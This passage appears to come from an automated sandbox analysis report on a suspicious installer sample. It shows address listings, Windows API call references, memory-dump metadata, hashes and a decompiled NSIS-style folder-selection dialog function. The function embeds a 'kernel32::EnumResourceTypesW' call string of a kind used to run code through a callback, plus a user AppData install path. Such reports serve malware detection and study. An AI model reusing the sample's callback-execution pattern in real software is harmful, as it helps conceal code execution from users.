                                                                                                                                                                                            0x004045fb
                                                                                                                                                                                            0x00404605
                                                                                                                                                                                            0x00404607
                                                                                                                                                                                            0x00404609
                                                                                                                                                                                            0x0040460b
                                                                                                                                                                                            0x00404634
                                                                                                                                                                                            0x0040463a
                                                                                                                                                                                            0x0040463c
                                                                                                                                                                                            0x00404640
                                                                                                                                                                                            0x00404642
                                                                                                                                                                                            0x00404646
                                                                                                                                                                                            0x0040464c
                                                                                                                                                                                            0x00404652
                                                                                                                                                                                            0x00404656
                                                                                                                                                                                            0x0040465a
                                                                                                                                                                                            0x0040465f
                                                                                                                                                                                            0x00404664
                                                                                                                                                                                            0x00404681
                                                                                                                                                                                            0x00404666
                                                                                                                                                                                            0x00404679
                                                                                                                                                                                            0x00404679
                                                                                                                                                                                            0x0040468b
                                                                                                                                                                                            0x00404690
                                                                                                                                                                                            0x00404694
                                                                                                                                                                                            0x004046a7
                                                                                                                                                                                            0x004046a8
                                                                                                                                                                                            0x004046aa
                                                                                                                                                                                            0x004046aa
                                                                                                                                                                                            0x0040465f
                                                                                                                                                                                            0x00404646
                                                                                                                                                                                            0x004046b1
                                                                                                                                                                                            0x004046b3
                                                                                                                                                                                            0x004046bb
                                                                                                                                                                                            0x004046cb
                                                                                                                                                                                            0x004046d1
                                                                                                                                                                                            0x004046d1
                                                                                                                                                                                            0x004046d9
                                                                                                                                                                                            0x004046db
                                                                                                                                                                                            0x004046e6
                                                                                                                                                                                            0x004046ea
                                                                                                                                                                                            0x004046ee
                                                                                                                                                                                            0x004046f5
                                                                                                                                                                                            0x004046f0
                                                                                                                                                                                            0x004046f0
                                                                                                                                                                                            0x004046f0
                                                                                                                                                                                            0x004046f8
                                                                                                                                                                                            0x004046f8
                                                                                                                                                                                            0x004046d9
                                                                                                                                                                                            0x004046fc
                                                                                                                                                                                            0x004046fc
                                                                                                                                                                                            0x004046fe
                                                                                                                                                                                            0x00404700
                                                                                                                                                                                            0x00404704
                                                                                                                                                                                            0x00404706
                                                                                                                                                                                            0x0040470c
                                                                                                                                                                                            0x00404713
                                                                                                                                                                                            0x004047ae
                                                                                                                                                                                            0x004047b0
                                                                                                                                                                                            0x004047b7
                                                                                                                                                                                            0x004047bb
                                                                                                                                                                                            0x004047d9
                                                                                                                                                                                            0x004047e1
                                                                                                                                                                                            0x00404819
                                                                                                                                                                                            0x0040481d
                                                                                                                                                                                            0x0040481f
                                                                                                                                                                                            0x00404823
                                                                                                                                                                                            0x0040482c
                                                                                                                                                                                            0x004049e5
                                                                                                                                                                                            0x004049eb
                                                                                                                                                                                            0x004049fe
                                                                                                                                                                                            0x00404a06
                                                                                                                                                                                            0x00404a1d
                                                                                                                                                                                            0x00404a1d
                                                                                                                                                                                            0x00404a23
                                                                                                                                                                                            0x00404a32
                                                                                                                                                                                            0x00404a32
                                                                                                                                                                                            0x00404832
                                                                                                                                                                                            0x00404834
                                                                                                                                                                                            0x00404836
                                                                                                                                                                                            0x0040483d
                                                                                                                                                                                            0x00404845
                                                                                                                                                                                            0x00404848
                                                                                                                                                                                            0x00404849
                                                                                                                                                                                            0x0040484b
                                                                                                                                                                                            0x0040484b
                                                                                                                                                                                            0x00404852
                                                                                                                                                                                            0x004048a8
                                                                                                                                                                                            0x004048aa
                                                                                                                                                                                            0x004048af
                                                                                                                                                                                            0x004048b5
                                                                                                                                                                                            0x004048ba
                                                                                                                                                                                            0x004048be
                                                                                                                                                                                            0x004048c4
                                                                                                                                                                                            0x004048ce
                                                                                                                                                                                            0x004049a3
                                                                                                                                                                                            0x004049af
                                                                                                                                                                                            0x004049bb
                                                                                                                                                                                            0x004049bb
                                                                                                                                                                                            0x004049c1
                                                                                                                                                                                            0x004049ca
                                                                                                                                                                                            0x004049ce
                                                                                                                                                                                            0x004049d3
                                                                                                                                                                                            0x004049dd
                                                                                                                                                                                            0x004049dd
                                                                                                                                                                                            0x004049e4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004049e4
                                                                                                                                                                                            0x004048d4
                                                                                                                                                                                            0x004048d8
                                                                                                                                                                                            0x004048db
                                                                                                                                                                                            0x004048df
                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                            0x004048e1
                                                                                                                                                                                            0x004048e5
                                                                                                                                                                                            0x004048eb
                                                                                                                                                                                            0x004048f1
                                                                                                                                                                                            0x004048f3
                                                                                                                                                                                            0x004048f7
                                                                                                                                                                                            0x00404905
                                                                                                                                                                                            0x0040490a
                                                                                                                                                                                            0x00404912
                                                                                                                                                                                            0x00404916
                                                                                                                                                                                            0x00404920
                                                                                                                                                                                            0x00404920
                                                                                                                                                                                            0x00404927
                                                                                                                                                                                            0x00404935
                                                                                                                                                                                            0x00404939
                                                                                                                                                                                            0x0040493b
                                                                                                                                                                                            0x0040493b
                                                                                                                                                                                            0x00404929
                                                                                                                                                                                            0x0040492b
                                                                                                                                                                                            0x0040492b
                                                                                                                                                                                            0x0040495b
                                                                                                                                                                                            0x00404969
                                                                                                                                                                                            0x0040497c
                                                                                                                                                                                            0x00404982
                                                                                                                                                                                            0x00404982
                                                                                                                                                                                            0x00404988
                                                                                                                                                                                            0x00404989
                                                                                                                                                                                            0x0040498f
                                                                                                                                                                                            0x00404997
                                                                                                                                                                                            0x0040499b
                                                                                                                                                                                            0x0040499f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404854
                                                                                                                                                                                            0x0040485f
                                                                                                                                                                                            0x00404862
                                                                                                                                                                                            0x00404866
                                                                                                                                                                                            0x0040486b
                                                                                                                                                                                            0x0040486d
                                                                                                                                                                                            0x00404871
                                                                                                                                                                                            0x0040488e
                                                                                                                                                                                            0x00404899
                                                                                                                                                                                            0x0040489f
                                                                                                                                                                                            0x004048a4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004048a4
                                                                                                                                                                                            0x00404877
                                                                                                                                                                                            0x00404882
                                                                                                                                                                                            0x00404885
                                                                                                                                                                                            0x00404886
                                                                                                                                                                                            0x00404888
                                                                                                                                                                                            0x0040488c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040488c
                                                                                                                                                                                            0x00404852
                                                                                                                                                                                            0x004047e3
                                                                                                                                                                                            0x004047ea
                                                                                                                                                                                            0x004047ed
                                                                                                                                                                                            0x004047ed
                                                                                                                                                                                            0x004047f3
                                                                                                                                                                                            0x004047fa
                                                                                                                                                                                            0x004047fd
                                                                                                                                                                                            0x004047fd
                                                                                                                                                                                            0x00404805
                                                                                                                                                                                            0x0040480a
                                                                                                                                                                                            0x0040480f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040480f
                                                                                                                                                                                            0x004047c6
                                                                                                                                                                                            0x004047cc
                                                                                                                                                                                            0x004047d0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004047d0
                                                                                                                                                                                            0x00404721
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404738
                                                                                                                                                                                            0x00404738
                                                                                                                                                                                            0x00404746
                                                                                                                                                                                            0x0040474f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404755
                                                                                                                                                                                            0x00404766
                                                                                                                                                                                            0x0040476b
                                                                                                                                                                                            0x0040477d
                                                                                                                                                                                            0x0040477d
                                                                                                                                                                                            0x0040477f
                                                                                                                                                                                            0x00404785
                                                                                                                                                                                            0x00404791
                                                                                                                                                                                            0x00404793
                                                                                                                                                                                            0x00404796
                                                                                                                                                                                            0x00404798
                                                                                                                                                                                            0x0040479d
                                                                                                                                                                                            0x004047a1
                                                                                                                                                                                            0x004047a5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004047a5
                                                                                                                                                                                            0x00404721
                                                                                                                                                                                            0x004045ef
                                                                                                                                                                                            0x004045f1
                                                                                                                                                                                            0x004045f3
                                                                                                                                                                                            0x004045f5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004045f5
                                                                                                                                                                                            0x004045d6
                                                                                                                                                                                            0x004045d8
                                                                                                                                                                                            0x004045da
                                                                                                                                                                                            0x004045de
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404381
                                                                                                                                                                                            0x00404386
                                                                                                                                                                                            0x0040438d
                                                                                                                                                                                            0x00404394
                                                                                                                                                                                            0x004043a0
                                                                                                                                                                                            0x004043b3
                                                                                                                                                                                            0x004043b9
                                                                                                                                                                                            0x004043c0
                                                                                                                                                                                            0x004043da
                                                                                                                                                                                            0x004043df
                                                                                                                                                                                            0x004043ec
                                                                                                                                                                                            0x004043f1
                                                                                                                                                                                            0x00404404
                                                                                                                                                                                            0x00404415
                                                                                                                                                                                            0x00404421
                                                                                                                                                                                            0x00404421
                                                                                                                                                                                            0x00404424
                                                                                                                                                                                            0x0040442a
                                                                                                                                                                                            0x0040442e
                                                                                                                                                                                            0x00404430
                                                                                                                                                                                            0x00404434
                                                                                                                                                                                            0x0040443d
                                                                                                                                                                                            0x0040443f
                                                                                                                                                                                            0x00404440
                                                                                                                                                                                            0x0040445a
                                                                                                                                                                                            0x00404461
                                                                                                                                                                                            0x00404464
                                                                                                                                                                                            0x00404464
                                                                                                                                                                                            0x00404466
                                                                                                                                                                                            0x00404467
                                                                                                                                                                                            0x0040446c
                                                                                                                                                                                            0x00404474
                                                                                                                                                                                            0x00404478
                                                                                                                                                                                            0x0040447c
                                                                                                                                                                                            0x0040447f
                                                                                                                                                                                            0x00404484
                                                                                                                                                                                            0x00404488
                                                                                                                                                                                            0x0040448b
                                                                                                                                                                                            0x00404490
                                                                                                                                                                                            0x00404494
                                                                                                                                                                                            0x00404496
                                                                                                                                                                                            0x0040449e
                                                                                                                                                                                            0x0040456b
                                                                                                                                                                                            0x0040457b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004044a4
                                                                                                                                                                                            0x004044a8
                                                                                                                                                                                            0x004044ab
                                                                                                                                                                                            0x004044ae
                                                                                                                                                                                            0x00404550
                                                                                                                                                                                            0x00404550
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404550
                                                                                                                                                                                            0x004044b9
                                                                                                                                                                                            0x004044bc
                                                                                                                                                                                            0x004044c4
                                                                                                                                                                                            0x004044cc
                                                                                                                                                                                            0x004044d4
                                                                                                                                                                                            0x004044d8
                                                                                                                                                                                            0x004044dc
                                                                                                                                                                                            0x004044e0
                                                                                                                                                                                            0x004044e4
                                                                                                                                                                                            0x0040451f
                                                                                                                                                                                            0x00404541
                                                                                                                                                                                            0x00404547
                                                                                                                                                                                            0x0040454d
                                                                                                                                                                                            0x00404521
                                                                                                                                                                                            0x00404530
                                                                                                                                                                                            0x00404530
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004044e6
                                                                                                                                                                                            0x004044e8
                                                                                                                                                                                            0x004044f1
                                                                                                                                                                                            0x00404508
                                                                                                                                                                                            0x0040450a
                                                                                                                                                                                            0x0040450f
                                                                                                                                                                                            0x00404514
                                                                                                                                                                                            0x00404515
                                                                                                                                                                                            0x00404515
                                                                                                                                                                                            0x00404554
                                                                                                                                                                                            0x00404554
                                                                                                                                                                                            0x00404555
                                                                                                                                                                                            0x0040455b
                                                                                                                                                                                            0x00404569
                                                                                                                                                                                            0x00404581
                                                                                                                                                                                            0x00404586
                                                                                                                                                                                            0x00404598
                                                                                                                                                                                            0x00404588
                                                                                                                                                                                            0x00404588
                                                                                                                                                                                            0x0040458f
                                                                                                                                                                                            0x00404595
                                                                                                                                                                                            0x00404595
                                                                                                                                                                                            0x00404599
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404599
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404569
                                                                                                                                                                                            0x0040449e

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404347
                                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404353
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040439A
                                                                                                                                                                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004043B3
                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,Function_00005755), ref: 004043CA
                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004043DF
                                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004043F1
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00001109,00000002), ref: 00404404
                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000111C,00000000,00000000), ref: 00404410
                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000111B,00000010,00000000), ref: 00404421
                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404424
                                                                                                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404450
                                                                                                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040445A
                                                                                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404502
                                                                                                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040452A
                                                                                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404541
                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0040456E
                                                                                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040457B
                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040458F
                                                                                                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 004046CB
                                                                                                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404746
                                                                                                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404764
                                                                                                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404791
                                                                                                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004047C6
                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 004047ED
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004047FD
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                                                                                                                                                                            • String ID: M
                                                                                                                                                                                            • API String ID: 1688767230-3664761504
                                                                                                                                                                                            • Opcode ID: 44581c10cf97d8ac0099209e67075e6e091120b59fe6c9767f264ef831488826
                                                                                                                                                                                            • Instruction ID: 3bf6712d719d3b88740652266c5cfc4025f4d074f3c874a014454f099a59398d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 44581c10cf97d8ac0099209e67075e6e091120b59fe6c9767f264ef831488826
                                                                                                                                                                                            • Instruction Fuzzy Hash: BD12CEB1604700AFD7209F24DD85B2BB6E9EBC8314F10493EFB95A72E1D77898418B99
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00403FA8 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 278COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                            			E00403FA8(void* __ebx, void* __ebp, struct HWND__* _a4, unsigned int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v4;
				CHAR* _v8;
				intOrPtr _v12;
				CHAR* _v24;
				signed int _v28;
				struct HWND__* _v32;
				unsigned int _v36;
				signed int _v40;
				long _v48;
				unsigned int _v52;
				signed int _v56;
				long _v64;
				long _v68;
				long _v72;
				unsigned int _v92;
				unsigned int _v96;
				unsigned int _t62;
				unsigned int _t64;
				unsigned int _t66;
				unsigned int _t68;
				unsigned int _t73;
				intOrPtr _t75;
				signed int _t88;
				unsigned int _t89;
				signed int _t91;
				unsigned int _t93;
				unsigned int _t96;
				int _t99;
				unsigned int _t104;
				unsigned int _t109;
				unsigned int _t111;
				CHAR* _t117;
				signed int _t118;
				unsigned int _t119;
				unsigned int _t121;
				char* _t123;
				struct HWND__* _t124;
				struct HWND__* _t125;
				unsigned int _t126;
				void* _t129;
				unsigned int _t134;
				unsigned int _t135;
				CHAR* _t138;
				unsigned int _t139;
				void* _t140;
				unsigned int _t141;
				unsigned int _t142;
				intOrPtr _t143;
				unsigned int _t146;
				struct HWND__* _t150;
				long* _t151;

				_t151 =  &_v72;
				_t126 =  *0x4205e4; // 0x54e0cc
				_t135 = _a8;
				_t138 = ( *(_t126 + 0x3c) << 0xa) + "kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
				_v52 = _t126;
				if(_t135 != 0x40b) {
					__eflags = _t135 - 0x110;
					if(_t135 != 0x110) {
						__eflags = _t135 - 0x111;
						if(_t135 != 0x111) {
							L19:
							_t62 = _t135;
							__eflags = _t135 - 0x40f;
							if(__eflags == 0) {
								L21:
								_v56 = _v56 & 0x00000000;
								E00406835(0x3fb, _t138);
								_t64 = E00406421(__eflags, _t138);
								_t146 = 1;
								_t117 = 0x420a00;
								__eflags = _t64;
								_t128 =  ==  ? 1 : 0;
								_v4 =  ==  ? 1 : 0;
								E0040690A(0x420a00, _t138);
								_t66 = E004066E5(1);
								_v96 = _t66;
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									E0040690A(_t117, _t138);
									_t68 = E004069B5(_t117);
									__eflags = _t68;
									if(_t68 != 0) {
										 *_t68 = 0;
									}
									_t73 = GetDiskFreeSpaceA(_t117,  &_v68,  &_v64,  &_v72,  &_v48);
									__eflags = _t73;
									if(_t73 == 0) {
										_t139 = _v36;
										_t118 = _v40;
										_t146 = _v56;
										goto L35;
									} else {
										_t88 = MulDiv(_v68 * _v64, _v72, 0x400);
										asm("cdq");
										_t118 = _t88;
										_t139 = _t134;
										L33:
										_v40 = _t118;
										_v36 = _t139;
										L35:
										_t129 = E004056BA(5);
										__eflags = _t146;
										if(_t146 == 0) {
											L40:
											_t119 = _a8;
											L41:
											_t75 =  *0x4237e0; // 0x5527aa
											__eflags =  *(_t75 + 0x10);
											if( *(_t75 + 0x10) != 0) {
												_push(0);
												E0040544F(_t129, 0x3ff, 0xfffffffb, _t129);
												__eflags = _t146;
												if(_t146 == 0) {
													SetDlgItemTextA(_t151[0x19], 0x400, 0x408462);
												} else {
													_push(_v40);
													E0040544F(_t129, 0x400, 0xfffffffc, _t151[0xd]);
												}
											}
											 *0x4240e4 = _t119;
											__eflags = _t119;
											if(_t119 == 0) {
												_t119 = E00401533(7);
											}
											_t140 = 0;
											__eflags =  *(_v52 + 0x14) & 0x00000400;
											_t141 =  ==  ? _t119 : _t140;
											__eflags = _t141;
											EnableWindow( *0x4205ec, 0 | _t141 == 0x00000000);
											__eflags = _t141;
											if(_t141 == 0) {
												__eflags =  *0x4205f8 - _t141; // 0x0
												if(__eflags == 0) {
													E0040542B();
												}
											}
											 *0x4205f8 =  *0x4205f8 & 0x00000000;
											__eflags =  *0x4205f8;
											goto L51;
										}
										__eflags = _t139;
										if(__eflags > 0) {
											goto L40;
										}
										if(__eflags < 0) {
											L39:
											_t119 = 2;
											goto L41;
										}
										__eflags = _t118 - _t129;
										if(_t118 >= _t129) {
											goto L40;
										}
										goto L39;
									}
								}
								_t121 = 0;
								__eflags = 0;
								while(1) {
									_t89 =  *_t66(0x420a00,  &_v40,  &_v64,  &_v48);
									__eflags = _t89;
									if(_t89 != 0) {
										break;
									}
									__eflags = _t121;
									if(_t121 != 0) {
										 *_t121 = _t89;
									}
									_t123 = E00406AC2(0x420a00);
									_t66 = _v92;
									 *_t123 = 0;
									_t121 = _t123 - 1;
									 *_t121 = 0x5c;
									__eflags = _t121 - 0x420a00;
									if(_t121 != 0x420a00) {
										continue;
									} else {
										_t117 = 0x420a00;
										goto L28;
									}
								}
								_t142 = _v52;
								_t118 = (_t142 << 0x00000020 | _v56) >> 0xa;
								_t139 = _t142 >> 0xa;
								__eflags = _t139;
								goto L33;
							}
							__eflags = _t62 - 0x405;
							if(__eflags != 0) {
								goto L51;
							}
							goto L21;
						}
						_t134 = _a12;
						_t91 = _t134 & 0x0000ffff;
						__eflags = _t91 - 0x3fb;
						if(_t91 != 0x3fb) {
							_t134 = 0x3e9;
							__eflags = _t91 - 0x3e9;
							if(_t91 != 0x3e9) {
								goto L19;
							}
							_t124 = _a4;
							_v28 = _v28 & 0x00000000;
							_v4 = _v4 & 0x00000000;
							_v32 = _t124;
							_v24 = 0x41f5e0;
							_v12 = E00404E24;
							_v8 = _t138;
							_v28 = E00405D47();
							_t93 =  &_v40;
							_v24 = 0x41;
							__imp__SHBrowseForFolderA(_t93, 0x420600,  *((intOrPtr*)(_t126 + 0x38)));
							__eflags = _t93;
							if(__eflags == 0) {
								L11:
								_t135 = 0x40f;
								goto L21;
							}
							__imp__CoTaskMemFree(_t93);
							E00406346(_t138);
							_t96 =  *( *0x424010 + 0x11c);
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags = _t138 - "C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne";
								if(_t138 == "C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne") {
									_push(_t96);
									_push(0);
									E00405D47();
									_t99 = lstrcmpiA(0x422fa0, 0x41f5e0);
									__eflags = _t99;
									if(_t99 != 0) {
										lstrcatA(_t138, 0x422fa0);
									}
								}
							}
							 *0x4205f8 =  *0x4205f8 + 1;
							__eflags =  *0x4205f8;
							SetDlgItemTextA(_t124, 0x3fb, _t138);
							goto L19;
						}
						__eflags = _t134 >> 0x10 - 0x300;
						if(__eflags != 0) {
							goto L19;
						}
						goto L11;
					} else {
						_t125 = _a4;
						_t150 = GetDlgItem(_t125, 0x3fb);
						_t104 = E00406B9E(_t138);
						__eflags = _t104;
						if(_t104 != 0) {
							_t111 = E004069B5(_t138);
							__eflags = _t111;
							if(_t111 == 0) {
								E00406346(_t138);
							}
						}
						 *0x4237dc = _t125;
						SetWindowTextA(_t150, _t138);
						_t143 = _a16;
						_push( *((intOrPtr*)(_t143 + 0x34)));
						_push("true");
						E00405409(_t125);
						_push( *((intOrPtr*)(_t143 + 0x30)));
						_push(0x14);
						E00405409(_t125);
						E004053F2(_t150);
						_t109 = E004066E5(9);
						__eflags = _t109;
						if(_t109 != 0) {
							 *_t109(_t150, "true");
						}
						L51:
						goto L52;
					}
				} else {
					E00406835(0x3fb, _t138);
					E00406AED(_t138);
					L52:
					return E004055E0(_t135, _a12, _a16);
				}
			}






















































                                                                                                                                                                                            0x00403fa8
                                                                                                                                                                                            0x00403fab
                                                                                                                                                                                            0x00403fb3
                                                                                                                                                                                            0x00403fbd
                                                                                                                                                                                            0x00403fc3
                                                                                                                                                                                            0x00403fcd
                                                                                                                                                                                            0x00403fe7
                                                                                                                                                                                            0x00403fed
                                                                                                                                                                                            0x00404067
                                                                                                                                                                                            0x0040406d
                                                                                                                                                                                            0x0040414f
                                                                                                                                                                                            0x0040414f
                                                                                                                                                                                            0x00404151
                                                                                                                                                                                            0x00404157
                                                                                                                                                                                            0x00404164
                                                                                                                                                                                            0x00404164
                                                                                                                                                                                            0x0040416f
                                                                                                                                                                                            0x00404175
                                                                                                                                                                                            0x0040417e
                                                                                                                                                                                            0x0040417f
                                                                                                                                                                                            0x00404184
                                                                                                                                                                                            0x00404187
                                                                                                                                                                                            0x0040418b
                                                                                                                                                                                            0x0040418f
                                                                                                                                                                                            0x00404195
                                                                                                                                                                                            0x0040419a
                                                                                                                                                                                            0x0040419e
                                                                                                                                                                                            0x004041a0
                                                                                                                                                                                            0x004041e8
                                                                                                                                                                                            0x004041ea
                                                                                                                                                                                            0x004041f0
                                                                                                                                                                                            0x004041f5
                                                                                                                                                                                            0x004041f7
                                                                                                                                                                                            0x004041f9
                                                                                                                                                                                            0x004041f9
                                                                                                                                                                                            0x00404211
                                                                                                                                                                                            0x00404217
                                                                                                                                                                                            0x00404219
                                                                                                                                                                                            0x00404254
                                                                                                                                                                                            0x00404258
                                                                                                                                                                                            0x0040425c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040421b
                                                                                                                                                                                            0x0040422e
                                                                                                                                                                                            0x00404234
                                                                                                                                                                                            0x00404235
                                                                                                                                                                                            0x00404237
                                                                                                                                                                                            0x0040424a
                                                                                                                                                                                            0x0040424a
                                                                                                                                                                                            0x0040424e
                                                                                                                                                                                            0x00404260
                                                                                                                                                                                            0x00404267
                                                                                                                                                                                            0x00404269
                                                                                                                                                                                            0x0040426b
                                                                                                                                                                                            0x0040427c
                                                                                                                                                                                            0x0040427c
                                                                                                                                                                                            0x00404280
                                                                                                                                                                                            0x00404280
                                                                                                                                                                                            0x00404285
                                                                                                                                                                                            0x00404289
                                                                                                                                                                                            0x0040428b
                                                                                                                                                                                            0x00404295
                                                                                                                                                                                            0x0040429a
                                                                                                                                                                                            0x0040429c
                                                                                                                                                                                            0x004042c2
                                                                                                                                                                                            0x0040429e
                                                                                                                                                                                            0x0040429e
                                                                                                                                                                                            0x004042ad
                                                                                                                                                                                            0x004042ad
                                                                                                                                                                                            0x0040429c
                                                                                                                                                                                            0x004042c7
                                                                                                                                                                                            0x004042cd
                                                                                                                                                                                            0x004042cf
                                                                                                                                                                                            0x004042d8
                                                                                                                                                                                            0x004042d8
                                                                                                                                                                                            0x004042e0
                                                                                                                                                                                            0x004042e1
                                                                                                                                                                                            0x004042e8
                                                                                                                                                                                            0x004042ed
                                                                                                                                                                                            0x004042f9
                                                                                                                                                                                            0x004042ff
                                                                                                                                                                                            0x00404301
                                                                                                                                                                                            0x00404303
                                                                                                                                                                                            0x00404309
                                                                                                                                                                                            0x0040430b
                                                                                                                                                                                            0x0040430b
                                                                                                                                                                                            0x00404309
                                                                                                                                                                                            0x00404310
                                                                                                                                                                                            0x00404310
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404310
                                                                                                                                                                                            0x0040426d
                                                                                                                                                                                            0x0040426f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404271
                                                                                                                                                                                            0x00404277
                                                                                                                                                                                            0x00404279
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404279
                                                                                                                                                                                            0x00404273
                                                                                                                                                                                            0x00404275
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404275
                                                                                                                                                                                            0x00404219
                                                                                                                                                                                            0x004041a2
                                                                                                                                                                                            0x004041a2
                                                                                                                                                                                            0x004041a4
                                                                                                                                                                                            0x004041b8
                                                                                                                                                                                            0x004041ba
                                                                                                                                                                                            0x004041bc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004041be
                                                                                                                                                                                            0x004041c0
                                                                                                                                                                                            0x004041c2
                                                                                                                                                                                            0x004041c2
                                                                                                                                                                                            0x004041ce
                                                                                                                                                                                            0x004041d0
                                                                                                                                                                                            0x004041d4
                                                                                                                                                                                            0x004041d7
                                                                                                                                                                                            0x004041d8
                                                                                                                                                                                            0x004041db
                                                                                                                                                                                            0x004041e1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004041e3
                                                                                                                                                                                            0x004041e3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004041e3
                                                                                                                                                                                            0x004041e1
                                                                                                                                                                                            0x0040423f
                                                                                                                                                                                            0x00404243
                                                                                                                                                                                            0x00404247
                                                                                                                                                                                            0x00404247
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404247
                                                                                                                                                                                            0x00404159
                                                                                                                                                                                            0x0040415e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040415e
                                                                                                                                                                                            0x00404073
                                                                                                                                                                                            0x00404077
                                                                                                                                                                                            0x0040407a
                                                                                                                                                                                            0x0040407d
                                                                                                                                                                                            0x0040409c
                                                                                                                                                                                            0x004040a1
                                                                                                                                                                                            0x004040a4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004040ad
                                                                                                                                                                                            0x004040b6
                                                                                                                                                                                            0x004040bb
                                                                                                                                                                                            0x004040c5
                                                                                                                                                                                            0x004040c9
                                                                                                                                                                                            0x004040cd
                                                                                                                                                                                            0x004040d5
